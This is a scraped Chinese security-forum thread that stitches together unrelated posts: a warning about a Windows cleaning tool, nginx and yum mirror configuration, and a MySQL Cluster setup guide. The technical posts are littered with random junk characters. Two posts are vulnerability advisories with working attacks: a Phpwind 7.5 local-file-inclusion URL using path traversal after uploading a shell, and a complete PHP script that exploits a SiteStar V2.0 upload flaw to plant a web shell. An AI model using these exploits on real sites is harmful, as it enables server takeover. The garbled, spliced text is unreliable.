返回列表 发帖

希望大家注意下!!!

windows 清理助手   小心点用。。有个清理的功能。如果全选了  点了清理  问题就大了。。本人2天 疯狂给电脑公司大电话  。。。。。。   问题如下
: j* M2 v3 `2 s4 R
* h, ]3 @! w1 o4 @" f3 d0 j
* y. j  g* C; b1 Q/ m% L2 t                清理之后  安装软件无法自动在桌面创建快捷方式  点开始 所有程序  (比如我安装360游览器,开始 所有程序 显示 空)    必须到安装目录自己导入   然后出现这个问题 我就上百度。。。百度上果然有人出现这个问题。。。按照大牛们的步骤 试了试。。没用。。。。没办法。。我估计是注册表的问题。导入注册表。。显示导入出错,  接着。我犯了一个不可逆转的错误。。重启了电脑。。。之后。。我进安全模式。。马上就蓝屏 自动重启。。。没办法。安全模式挂了。。。进正常吧。。。没想到还是一样   一样蓝屏重启。。。我本来想重装的。把光盘放进去 无法进行光盘引导。。我日了。。。。没办法 给电脑公司打电话。。。换了配置!  速度变快啦。哈哈   然后。。现在就在用这个系统给大家写。。$ q8 ^4 c1 u$ R! ~
( C  ?+ a8 M. c5 K! c. b
5 a! F: @3 _2 g% S

0 M1 \5 V! b. E  h8 \     很累的。希望大家顶顶。。7 I3 d; H- p* H( c+ N" V; `& Z1 [
# u  E+ i6 c$ o2 q% A' g
) r$ ?7 `# y4 P& I$ h+ T( [. p7 k
            windows清理助手 虽然是好。也小心点9 Q$ B0 N5 N: P, t- A2 q, [- P: T
  注册表备份不要随便导入!!!  出错了不要随便点重启。

 

您可能还想看的主题:

腾讯招聘业务安全工程师

windows SDK 系列课程全套

五十三种木马启动方式

简单web服务器文件管理5.3缓冲区溢出

记一次曲折的渗透和另类的提权

安全宝招聘安全服务工程师

PHP 5.4 (5.4.3) Code Execution (Win32)

Android系统再现木马,变身驱动程式袭击用户

马化腾:Android时代将存在安全危机

研究人员发现新型“无文件”恶意软件

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:秋#风发表,本帖发表者秋#风符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者秋#风和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。
攻防无绝对 技术无黑白

哈哈 记住了 我电脑两年没有装系统了 不用那玩意 直接自己备份数据到其他盘 C盘只放系统 注册表直接导出

TOP

我一般也不要这些东西,简单点好啊

TOP

Phpwind7.5 后台本地包含漏洞
漏洞文件:hack
. K  O' Q( p4 }3 L$ ~7 Sateadmin.php8 B, W+ E: b) y. v
源码:
* o9 v3 \2 F% ~& r: X<?php
2 ]0 O0 u* T) J9 U8 G!function_exists('readover') &amp;&amp; exit('Forbidden');
& u, M0 b; |  U& g6 G) Mdefine ( "H_R", R_P . "hack/rate/" );8 e% I" m# c4 k( e1 p
define ( "L_R", R_P . "lib/" );! I3 H! l) c  A! M& Q2 ^
InitGP ( array ('ajax' ) );7 N: ?8 w2 P5 I1 u+ K5 G1 f
$action = strtolower ( ($job) ? $job : "admin" );
  V" t* `4 O# e; O& n$filepath = H_R . "action/" . $action . "Action.php";
1 C; w2 O# T; r% m% u' a/ c
(! file_exists ( $filepath )) &amp;&amp; exit ();

4 s$ Q, h1 C; g9 z  ^* ]
if ($job != "ajax") {
! l- P1 j3 W  D- Q  k' Z    require H_R . '/template/layout.php';6 V" e6 d; G0 w0 i! G
} else {
1 Y0 E. S( F9 g" L; }    require_once $filepath;
( d: f1 |) J  Y: f3 T* \}

* C6 Q( x( ~  m0 ^1 L
?>
0 u6 H/ J1 U8 n2 B! s
再看看hack+ M8 E$ o7 D# e/ R# i
ate        emplatelayout.php:
4 w- D3 ]5 A7 h' n5 h<?php
% q% n, Q0 d1 d# O!function_exists('readover') &amp;&amp; exit('Forbidden');% e& W6 A6 R, d
include_once PrintEot ( 'left' );
2 J* z2 b* J1 ?, x$ G( Xprint <<<EOT7 V- J5 d1 }7 u: H
-->
- Q3 j3 n9 J' |) s5 vEOT;
# F' j* G! u5 _' y# ^; Arequire_once $filepath;# w' K7 B1 ^0 p1 A
include_once PrintEot ( 'adminbottom' );
: L# m5 T: }5 x. g8 E. ^  w?>
  x6 D1 @( n: J7 p  B! |
$job可以自定义,触发本地包含,只不过addslashes了,因此不能通过%00截断;但可以通过若干///////截断,或者直接在tmp文件夹下写个shell来包含。
  Y/ y7 u6 ?3 v
& l) b  e$ n$ u' b8 `# W
# m- v7 \9 s4 E/ j" n0 h. g" a* k测试方法:0 A; M* P8 o) t( G+ Q9 R
提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!先在tmp下上传一个shell,名为Action.php
6 V3 i; H; }* f, e  H然后访问:http://www.sitedir.com.cn/admin.php?adminjob=hack&amp;hackset=rate&amp;typeid=100&amp;job=../../../../../../tmp/, z% c& U2 [" d/ q$ X" i* ?" R) x

; G6 [  `, l# }$ U0 r, B , V3 E" W# e, B% _, J

- F6 U7 K% _8 }8 U$ w. V0 @临时补丁:

6 O5 z3 T  C1 T9 [& P) ^# ^, |, L
$filepath = H_R . "action/" . $action . "Action.php";
* j0 ?; ]$ ^8 Z1 r8 w2 z替换为:: P( T9 w2 _" e& M( h; G' f
$filepath = Pcv(H_R . "action/" . $action . "Action.php");
  P. W5 F, j( R! P4 B0 p6 }
, C* B' W9 ]5 g: \& `) a, {* q
6 T( V1 l4 w( N2 _
5 T9 N7 `4 g* c( a* R3 I

2 a) }+ E. A0 t" e! f; [! p
/ i7 m/ |7 A$ x7 O
: J2 G2 w! G' o) K
; n3 Q. Z' ~  }/ {8 ^5 s1 y$ s7 p4 ?2 ^- z# |: `3 r

' S- }1 B9 K6 A1 Q1 A, R
* P# N- d# y% f0 S+ v) J6 d8 j- Y0 j, L, a3 X  F3 X5 d3 L0 B

/ Y% v# P2 }; M; i- q$ v: D$ Q2 @

3 S. c& b# d1 c2 K9 e+ p. @
* W' ]+ H2 `/ a; j2 a9 H4 G: c6 a; i& V( I( M- ?8 R

0 ~8 U' D: K) `: v& M  k
  X; E; m) T+ h; p
* i0 h/ J  q8 L9 Z/ H. `& E公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

配置centos更新源的缓存服务器
如果设置源服务器为163的,你有很多服务器需要处理,那建立一个本地缓存服务器是一个很好的选择,更新一次后,那之后的更新速度可就快的要命啊。。
; {- c* W* t7 V1 @) W1 u, D
配置nginx为类似如下样子,自行修改自己的需求:
& s1 @$ N! F* L" K, ~+ R0 k) W
7 J3 @- G  {8 x/ J1 hupstream backend {0 d# r. |3 R8 n, h
  server mirrors.163.com:80 ;! W; ^& U4 f( r
}
) G2 k5 k* {' F% O* E0 ?
server {
! _% L# m# u. h* m  B, B5 z  #server_name  www.aslibra.com;
- b% \0 Y* H5 V; o  e  server_name  mirrors.aslibra.com;
5 Q3 ]6 k# V; L  set $index 'index.htm';
3 D/ ]( f" m2 n4 c+ y  set $store_file $request_filename;
, Y8 s7 @0 m) x5 r* y/ E  #root    /Data/www.aslibra.com;
4 X2 M$ \+ |7 f0 Z$ ?. T- [  root    /Data/mirrors/mirrors.163.com;
( G1 w# X9 y5 r6 y  if ($uri ~ /$ ){+ ?1 D# K# p0 t. H4 B0 {
    set $store_file $request_filename$index;: p6 F/ e6 D6 R( }/ O
  }3 X5 X( J1 d7 w; J* [% G' m
  location /centos/ {
' c+ ~4 _; h, I3 m9 b, v    index index.htm;  Y, \! Z' K; f' X9 f2 a8 S
    proxy_store on;, e; l: |) z* i! x0 r
    proxy_temp_path /Data/mirrors/tmp;
" W7 N+ S" K# N    proxy_set_header Host mirrors.163.com;' ]) ~7 a( d2 c% b( M/ e
    proxy_store_access user:rw group:rw all:rw;
* o8 ~' J8 e/ }. ]    if ( !-e $store_file ) {8 q; s. c4 W& \% t+ X
      proxy_pass http://backend;, [' X- l9 Q& d9 h, X$ K$ B% s0 g. `
    }
$ D# W& ]7 ]2 e) K$ m  }9 p/ R1 [/ P4 m" a
}

, [2 ~  N& ~4 |  D. x
. q. @& o& z7 r+ j) V& z( h# B9 k$ uyum的配置可以如下:
3 W8 m( p* ?' F
( X0 g5 Q4 A9 T$ X% @0 k5 ^3 r[base]
* ]( w; j7 u  G7 j3 x& Kname=CentOS-$releasever - Base3 T+ ]1 @7 R. o2 e' R
baseurl=http://mirrors.aslibra.com/centos/$releasever/os/$basearch/' [+ y7 [" {# z% e3 A5 a1 I
gpgcheck=1
* j8 \) [- U1 a7 agpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
4 m& b8 v7 r. L3 Y
[updates]
) D1 q" ]& M/ W7 i7 Yname=CentOS-$releasever - Updates
$ G& y' y- k& }0 M1 U# W6 qbaseurl=http://mirrors.aslibra.com/centos/$releasever/updates/$basearch/
' Z' b  N  E4 |% X% u+ zgpgcheck=1! V( B# y& q! B
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
9 ]$ G2 O: ?. l# d
[addons]# f; a4 D1 K# \6 D# @
name=CentOS-$releasever - Addons
! }* P, E" D2 C" g8 O2 zbaseurl=http://mirrors.aslibra.com/centos/$releasever/addons/$basearch/
0 o' Z0 S& ^) I$ M" p, {gpgcheck=1: l: g; |8 K6 w' {0 x
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5

1 B) D, _% Y, E6 D- E
[extras]: V: ~. v: U$ f
name=CentOS-$releasever - Extras+ Q+ `- T- v0 a! E* v" k
baseurl=http://mirrors.aslibra.com/centos/$releasever/extras/$basearch/
+ T2 {/ a+ R9 w- Fgpgcheck=1; \4 i6 I; }0 I6 [* q. ?& k- J0 ?
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5

, @; G; h4 c; q8 Z6 `- E/ Z3 [- \
[centosplus], I4 Y! a7 X" V1 ~# d* @
name=CentOS-$releasever - Plus0 S* F8 g2 t+ }( ?8 \5 k7 v9 y
baseurl=http://mirrors.aslibra.com/centos/$releasever/centosplus/$basearch/
) h& z$ _. T& T7 jgpgcheck=1
( V1 G7 w+ p6 i, q, Benabled=0  k2 x0 z. w4 e7 r& @6 E
gpgkey=http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5
; g4 D; {. D. r$ @' x
# S" L0 T) z" }. y! q# ^3 E# \& X就这样OK了!
5 M  ]9 T! F# m4 M
' o2 _3 h# g  s
, A: W4 P+ i7 D0 B6 t+ V* L- L0 D
  Y' k+ t8 g0 k2 p& A6 H7 V8 _  K9 `
1 v1 j. n; P2 _, S

% Z& z( z+ H: ~# x! P
  X' I/ x6 [4 Q' ~' Y0 ^* p* p0 ~' Y+ c2 K3 W
) ^, [8 W3 F; W4 a! v2 v4 r! s) _; x

7 X( I/ n% K3 ^7 N" t. l! ]% b( q7 N/ W7 v! @- E
1 a  l8 q& M7 C$ a0 x

' J* t( ?/ l2 S8 r5 f) n) e: G9 O; w" g& \  g" k" u. [8 q

) Y8 `: N/ `1 h$ Y9 m: D2 ~  O! m0 G6 [3 l$ x2 `7 G

/ e! p* j. g. k$ n3 ^# ~6 n6 Z. {. e/ U4 N9 z8 j: e7 J- j! H$ B
. g) y0 ?% i/ P* f! _

4 v: i& b2 T1 W5 O2 b9 _3 K. A公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

mysql cluster初体验

& ^, S# v# ]8 l5 v$ _5 v' S<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>1、准备服务器现在,我们计划建立有5个节点的MySQL CLuster体系,因此需要用到5台机器,分别做如下用途:[/quote]                节点(用途)                IP地址(主机名)管理节点(MGM)                192.168.0.1(db1)SQL节点1(SQL1)                192.168.0.2(db2)SQL节点2(SQL2)                192.168.0.3(db3)数据节点1(NDBD1)        192.168.0.4(db4)数据节点2(NDBD2)        192.168.0.5(db5)8 i0 S2 V9 f" ~+ |& L( B. w6 M
<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>2、注意事项及其他每个节点的操作系统都是Linux,下面的描述中将使用主机名,不再使用IP地址来表示。由于MySQL Cluster采用TCP/IP方式连接,并且节点之间的数据传输没有加密,因此这个体系最好只在单独的子网中运行,并且考虑到传输的速率,强烈建议不要 跨越公网使用这个体系。所需的MySQL软件请事先在 http://dev.mysql.com/downloads 下载。实际上整个体系可以在一个单独的实体计算机上运行成功,当然了,必须设定不同的目录以及端口等,只能作为测试时使用。开始安装阶段:1、假定条件在每个节点计算机上都采用 nobody 用户来运行Cluster,因此执行如下命令添加相关用户(如果已经存在则略过,且用root用户执行):[/quote]        root# /usr/sbin/groupadd nobodyroot# /usr/sbin/useradd nobody -g nobody
. e  ?8 A- r, y& \<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>假设已经下载了mysql可直接使用的二进制安装包,且放在 /tmp 下了。2、SQL节点和存储节点(NDB节点)安装(即4个机器重复执行以下步骤)[/quote]        root# cd /tmp/root# tar zxf mysql-max-5.0.24-linux-i686.tar.gzroot# mv mysql-max-5.0.24-linux-i686 /usr/local/mysql/root# cd /usr/local/mysql/root# ./configure --prefix=/usr/local/mysqlroot# ./script_s/mysql_install_dbroot# chown -R nobody:nobody /usr/local/mysql/
# g" }  \& I9 _8 f+ y<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>3、配置SQL节点[/quote]        root# vi /usr/local/mysql/my.cnf
0 f0 h( |6 }2 g. c' Q7 i7 |<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>然后输入如下内容:[/quote][mysqld]basedir         = /usr/local/mysql/datadir         = /usr/local/mysql/datauser            = nobodyport            = 3306socket          = /tmp/mysql.sockndbclusterndb-connectstring=db1[MYSQL_CLUSTER]ndb-connectstring=db1
% O+ y% t4 i3 V" M<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>4、配置存储节点(NDB节点)[/quote]        root# vi /usr/local/mysql/my.cnf
3 w; q" x7 ^; b: B2 z" C* Y$ p; a<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>然后输入如下内容:[/quote][mysqld]ndbclusterndb-connectstring=db1[MYSQL_CLUSTER]ndb-connectstring=db1+ h' r% ~5 {6 J! l8 @
<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>5、安装管理节点[/quote]        root# cd /tmp/root# tar zxf mysql-max-5.0.24-linux-i686.tar.gzroot# mkdir /usr/local/mysql/root# mkdir /usr/local/mysql/data/root# cd mysql-max-5.0.24-linux-i686/bin/root# cp ndb_mgm* /usr/local/mysql/root# chown -R nobody:nobody /usr/local/mysql" {: j' z7 |7 e5 ?. w/ ^6 o
<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>6、配置管理节点[/quote]                root# vi /usr/local/mysql/config.ini% B! a1 b, `/ ?7 H3 w( R$ p. l" g, u
<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>然后输入如下内容:[/quote][NDBD DEFAULT]NoOfReplicas=1[TCP DEFAULT]portnumber=3306#设置管理节点服务器[NDB_MGMD]hostname=db1#MGM上保存日志的目录datadir=/usr/local/mysql/data/#设置存储节点服务器(NDB节点)[NDBD]hostname=db4datadir=/usr/local/mysql/data/#第二个NDB节点[NDBD]hostname=db5datadir=/usr/local/mysql/data/#设置SQL节点服务器[MYSQLD]hostname=db2#第二个SQL节点[MYSQLD]hostname=db3. b1 L1 i0 a, L: K- g  c& U; @
<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>注释: Cluster管理节点的默认端口是1186,数据节点的默认端口2202。从MySQL 5.0.3开始,该**已被放宽, Cluster能够根据空闲的端口自动地为数据节点分配端口。如果你的版本低于5.0.22,请注意这个细节。五、启动MySQL Cluster较为合理的启动顺序是,首先启动管理节点服务器,然后启动存储节点服务器,最后才启动SQL节点服务器:[/quote]
, Y( ^& W: x1 W5 Q3 u
2 i1 `: V5 ^+ i! A在管理节点服务器上,执行以下命令启动MGM节点进程:                root# /usr/local/mysql/ndb_mgmd -f /usr/local/mysql/config.ini        7 A) F" Y" l  m0 P6 N
<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>必须用参数“-f”或“--config-file”告诉 ndb_mgm 配置文件所在位置,默认是在ndb_mgmd相同目录下。[/quote]
% k  o3 u. y: z% j在每台存储节点服务器上,如果是第一次启动ndbd进程的话,必须先执行以下命令:                root# /usr/local/mysql/bin/ndbd --initial        
( m; o+ l4 R9 P2 M) x% q: }. x( \, r<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>注意,仅应在首次启动ndbd时,或在备份/恢复数据或配置文件发生变化后重启ndbd时使用“--initial”参数。因为该参数会使节点删除由早期ndbd实例创建的、用于恢复的任何文件,包括用于恢复的日志文件。如果不是第一次启动,直接运行如下命令即可:[/quote]                root# /usr/local/mysql/bin/ndbd        
6 O5 ~6 D* v$ Q4 O最后,运行以下命令启动SQL节点服务器:                root# /usr/local/mysql/bin/mysqld_safe --defaults-file=/usr/local/mysql/my.cnf &amp;        7 l5 T! J& p  H* o! [+ ?5 B! W0 Z
<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>如果一切顺利,也就是启动过程中没有任何错误信息出现,那么就在管理节点服务器上运行如下命令:[/quote]                root# /usr/local/mysql/ndb_mgm        -- NDB Cluster -- Management Client --        ndb_mgm> SHOW        Connected to Management Server at: localhost:1186        Cluster Configuration        ---------------------        [ndbd(NDB)]     2 node(s)        id=2    @192.168.0.4  (Version: 5.0.22 Nodegroup: 0 Master)        id=3    @192.168.0.5  (Version: 5.0.22 Nodegroup: 0)        [ndb_mgmd(MGM)] 1 node(s)        id=1    @192.168.0.1  (Version: 5.0.22)        [mysqld(SQL)]   1 node(s)        id=2   (Version: 5.0.22)        id=3   (Version: 5.0.22)        
2 [* d5 F9 D3 _5 [<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>具体的输出内容可能会略有不同,这取决于你所使用的MySQL版本。注意:如果你正在使用较早的MySQL版本,你或许会看到引用为‘[mysqld(API)]’的SQL节点。这是一种早期的用法,现已放弃。现在,应能在MySQL Cluster中处理数据库,表和数据。六、创建数据库表与没有使用 Cluster的MySQL相比,在MySQL Cluster内操作数据的方式没有太大的区别。执行这类操作时应记住两点:[/quote]/ H0 H- U: n4 J) |& t

) L' `* s. V2 Y# ~8 H2 S' a表必须用ENGINE=NDB或ENGINE=NDBCLUSTER选项创建,或用ALTER TABLE选项更改,以使用NDB Cluster存储引擎在 Cluster内复制它们。如果使用mysqldump的输出从已有数据库导入表,可在文本编辑器中打开SQL脚本,并将该选项添加到任何表创建语句,或 用这类选项之一替换任何已有的ENGINE(或TYPE)选项。( N& `! O$ A- d
另外还请记住,每个NDB表必须有一个主键。如果在创建表时用户未定义主键,NDB Cluster存储引擎将自动生成隐含的主键。(注释:该隐含 键也将占用空间,就像任何其他的表索引一样。由于没有足够的内存来容纳这些自动创建的键,出现问题并不罕见)。
% c8 \2 K, s  N2 `<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>下面是一个例子:在db2上,创建数据表,插入数据:[/quote][db2~]root# mysql -uroot test[db2~]mysql> create table city([db2~]mysql> id mediumint unsigned not null auto_increment primary key[db2~]mysql> name varchar(20) not null default [db2~]mysql> ) engine = ndbcluster default charset utf8;[db2~]mysql> insert into city values(1 city1);[db2~]mysql> insert into city values(2 city2);
8 Q3 b5 W2 `8 \8 n6 P+ {<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>在db3上,查询数据:[/quote][db3~]root# mysql -uroot test[db2~]mysql> select * from city;+-----------+|id | name  |+-----------+|1  | city1 |+-----------+|2  | city2 |+-----------+7 g- `" i# `5 Z4 |  ?
<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>安全关闭要想关闭 Cluster,可在MGM节点所在的机器上,在Shell中简单地输入下述命令:[/quote]        [db1~]root# /usr/local/mysql/ndb_mgm -e shutdown
1 ]% e4 m( P7 `7 x6 j4 K<P style=TEXT-INDENT: 2em; LINE-HEIGHT: 30px; TEXT-ALIGN: left>运行以下命令关闭SQL节点的mysqld服务:[/quote]        [db2~]root# /usr/local/mysql/bin/mysqladmin -uroot shutdown, R8 V) E3 g. u
6 R$ U4 T6 t/ e/ W' @' N( g
. X: ]) x- b7 Z& r
& J1 z3 |* `5 L  S- P6 q
' P& g, ?: z, }/ {( S4 y2 V7 \

$ l) p' A/ H: f) ?$ P
, s  B3 D' U. }1 }
1 R" W( X% r* R3 G0 R& n* ?
1 w/ W; ~* u  R4 h' A6 |  U) }1 X/ A% v$ q5 ?. A
# c# v! U) w3 G* b9 f& O

: ]! F6 d- E7 ~; A9 o5 s8 O3 U
2 _7 {; {. `' y# n! A# h1 X0 M5 M% @" A  S5 \

" I' R+ n$ t# W0 i& M! \( {
( f1 J3 y3 v% Y4 X0 p( s+ |7 L* R1 y# }/ k
5 U( d- Y+ t$ c% t$ x
; U) @; Y! d) ?4 G: [
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

建站之星 SiteStar V2.0 任意文件上传漏洞
发布日期:2011-03.16
3 y+ f- P2 B7 k/ s7 G9 ~; l: l+ z6 l
/ j0 T: t! F( N" `/ m  T3 T% X
, T; m. K# d. t) T$ t发布作者:cnryan7 W# y( f: J5 e4 j0 ]2 I

9 S( p. L+ Z0 f6 E) K6 M. M0 P
# b4 @+ w: R& |4 ~# U' M& K" h% i1 C影响版本:SiteStar V2.0 beta9 @0 C, L& W8 S2 Y  l0 x0 r& N
  }- J% S) I) g* Z' Q# ~5 k, s* O
0 T+ G$ U- r( q
官方网站:http://www.sitestar.cn/
/ g$ X$ |" p! Z4 L0 u4 j) s5 O3 ^/ p8 _) B, z' Y2 e

9 W; R4 A) Q9 l) ^& v1 z! L漏洞类型:文件上传
/ X$ j$ k1 \( k0 r7 h+ I% o$ Q" H* B+ x
# P# _6 M5 q0 o& v# i/ }- Q# U  G& V4 x
[1]漏洞概述:3 G# B! U7 Z, g9 h
6 ]3 u' b7 \( ~  ]: L6 h% i
9 G! @. w, `3 R2 d
SiteStar V2.0没有正确限制文件的上传,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令。4 O  p4 D7 m/ a
3 p7 U; d) |, F/ o% f) M* z" D
8 ~5 N6 Z4 k8 m8 d
[2]漏洞分析:
! M7 ~4 r2 }4 B- }% [  B. l+ ^4 L! Q3 ~2 v7 ~& v" Q6 z

( \  U& e) h, v漏洞产生在 /script/multiupload/uploadify.php 文件:
7 j, {+ `0 S+ Z4 i- E6 Y( x6 X
% T# u  ]6 f4 w+ E: }
: [+ J( g) X- W- S9 e2 W. ]: {3 X, j<?php
7 _4 j) q3 x  v$ `if (!empty($_FILES)) {" a3 R+ E) A4 D& _! Q; D1 A; @
$tempFile = $_FILES['Filedata']['tmp_name'];
0 y1 ~8 K" K' v1 d/ d9 `) | $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/';
" n, ^0 n& u8 V" |. R9 z/ J# }2 u $targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
& g, Y+ T$ S# {9 P  w7 j" c9 k   // 解决Windows中文文件名乱码
4 I; n2 r; u% H+ O; @5 X, u if (preg_match("/^WIN/i", PHP_OS)) {
, |3 a  v: f$ }* j3 p  $targetFile = iconv('UTF-8', 'GBK', $targetFile);# \  q5 Y! c1 Q) I
}4 F* s4 g5 J, w; n9 m6 @& X$ K
move_uploaded_file($tempFile, $targetFile);
4 r. e& |1 J* ?  N' o) Y1 W echo "1";
' M" g+ o; v% C/ N, {' G# D}5 Z2 `  B  s4 E$ J; D& z
?>
  p/ G1 P. A! K没什么好说的,低级失误。通过构造html表单可直接上传webshell至web目录,下面提供一段测试代码。
$ r1 \" M7 @) v6 c( i3 }! V5 ]0 |, k- p7 J, Q3 `% L6 X! k

% X, ]; |. W4 j% l<?1 D! ~, v' k& N" @7 A
print_r(', K: B! G) b0 H$ z# U, ~; m5 T
+---------------------------------------------------------------------------+; }' h# p2 j) ]: r2 H5 [/ ?  B
SiteStar V2.0 Remote Shell Upload Exploit
- q9 R8 [, ~& \6 Dby cnryan
! m; q$ c* c* E. ~5 ZMail: cnryan2008[at]gmail[dot]com! m# ^) V6 w5 {9 {
Blog: http://hi.baidu.com/cnryan
* W* T' V% P- M5 U, f; [# _+---------------------------------------------------------------------------+
. ]3 F; E0 ~. ~' D+ I');
7 c% w3 i' q( |$ \3 x) Z1 Dif ($argc < 3)7 g9 X' V& d' z" Z9 _8 p
{
' u6 Q: }# d2 a. W- S0 ^4 p    print "' D5 m: V, e% T! W/ W9 K5 r
Usage: php $argv[0] host path
- K# F# r+ V' J4 q" y5 x/ J7 N";
6 p( h5 ]; V1 H. d3 ?0 N2 t    print "Example: php $argv[0] localhost /sitestar/
5 h6 B: \+ M  ?# @! ^1 V/ Y4 T";
/ R. g# L) d  }  n( v3 l; Z3 i    die();& S' y. P* F4 [$ Z
}7 `. w! L* o, m2 i+ {
error_reporting(0);5 A1 S  P6 @$ f( U+ w; b
set_time_limit(0);- }  W3 W0 T- V8 b1 E' {6 q
$host = $argv[1];
& D1 v1 E& B6 z% t; ]3 d2 Y$path = $argv[2];' q# y0 d  {1 u2 d. B! O8 B5 Y' w8 k
$shell = 'http://'.$host.$path.'cnryan.php';) I9 J6 o' Y/ i- O. ?
    $payload  = "-----cnryan
; W# b$ N" M8 J" n";3 q3 k5 {2 i/ j  D9 `) Z
    $payload .= "Content-Disposition: form-data; name="Filedata"; filename="cnryan.php"# k' O2 M: h- W, L  R6 I# P
";
- j7 V; `# @5 ?    $payload .= "Content-Type: application/octet-stream
* g9 V9 R2 d' C" n2 H6 P5 }
, G7 @) ^5 u6 A/ _";" @* j& {6 c& l% I& w2 M
    $payload .= "<?php phpinfo();?>W.S.T
  _( R5 \. ^/ w. j-----cnryan
2 a1 J& ~) R1 d";
. f4 N3 T) |. w- d& f2 ^    $payload .= "Content-Disposition: form-data; name="upload"
% w( R/ u9 O" w/ e
& s  V2 \( h9 M8 S/ |% O7 d, F1 N' ~) V+ T+ S
";" j5 N" [1 k) w* N$ ^: ?
    $payload .= "-----cnryan
0 {, U' K) N& B& |& |";% r: L8 i- g& x5 b4 U
    $payload .= "Content-Disposition: form-data; name="folder"
+ q/ [3 i* Z7 t( O* v) K- `" z! }. Q! S1 }1 }" ~& c& |
";
5 b5 O3 [, q: Q, }- m% T4 c    $payload .= "$path# d1 V) g# g) ]1 ^+ I3 ]5 F
";
$ J' r% t6 O) G) U4 L    $payload .= "-----cnryan--";
8 M2 V# M+ {0 L/ }    $packet  = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0/ D# U# W1 k% F; o8 ~4 r- j8 T
";
& }' Z' A; v. c' U% Z! p    $packet .= "Host: {$host}
" i' q( y5 g4 O* |" Y, i0 T  ]; u";
8 D+ ^& W, @/ U, X6 ~    $packet .= "Connection: keep-alive
9 Z' o4 `4 J+ |4 ?9 N";
6 w' l! I/ i/ o, H/ E, p    $packet .= "Content-Type: multipart/form-data; boundary=---cnryan8 e8 s# V. E) }. U# M) W( T6 b
";8 E( _5 V9 E: i! m3 e; r, Z
    $packet .= "Content-Length: ".strlen($payload)."; f) R7 t! U' M2 Y3 M8 f

: L6 c# q. A4 L' a4 [6 ~) `5 d";% @- R+ I; u- [1 J) S! R7 V: O. l
    $packet .= $payload;
% e9 L3 Q) n0 A+ G: |7 J$ `/ w$fp = fsockopen($host, 80);2 a) R1 J4 E, B) a; g6 N# q3 I
    fputs($fp, $packet);
4 M' K  I9 V$ O$ e+ ?. A5 g! X; g$ w' @8 N: e
" q' G0 _+ Q  E. h: g
   sleep(5);$ B% i* O8 d) Y$ Q' O, W% p
   $str=file_get_contents($shell);' B4 c" S  t; k4 {
if(strpos($str,'W.S.T'))
$ X2 t$ N% ?# h; W0 [    exit("OK! Got shell:        $shell
$ A1 g7 n( b* b; {+ K* I! k");
+ a! D& b6 A1 @5 telse
' N5 q7 ?( Q/ c    exit("Exploit Failed!
8 n; L& {& o6 v5 U" ~' S0 Z");
3 D* D, u$ U, b- t- n3 V?> + B4 G% Y, f) T0 z% `6 n& f7 L
[4]漏洞状态:
8 e* k9 {% J3 H, v
/ e1 {7 S8 Z7 r. Z# g# P1 b: Q7 r' d% t5 i6 g: B) o5 w5 M! @
漏洞已通知厂商。3 D( v2 Q% |) R9 C$ F+ z2 z- H
& ^9 {" D4 D7 v0 q: ]) K

* {7 e* Q5 B4 q- i( M6 j[5]厂商回复:) R( r3 O6 T( h! q3 A6 B* R
( z2 D: c' g- K6 O

/ r9 j' O! S" e% _" e/ ]! e感谢您的反馈,谢谢!
# v6 ~' V4 T* |; z, k" M
$ Z; P3 h, c# k5 N3 \! N
  O+ e9 V) n2 L5 V9 Q0 {7 _5 ~% M1 W" B" D2 c6 n( f/ K9 q
  t; V7 Z6 j6 O% j( t  T* s
8 W  ~- m# s+ k9 j
& ^  F/ B) c8 d  t" R8 }1 L+ i' i
! Z: a8 b4 G* C7 r# ]6 Y$ n
" H2 z% p( @5 t  @1 ]* D" g

3 e2 _  [) R" q: F! G$ e1 r
. K. N4 v' b+ Z& n; Q
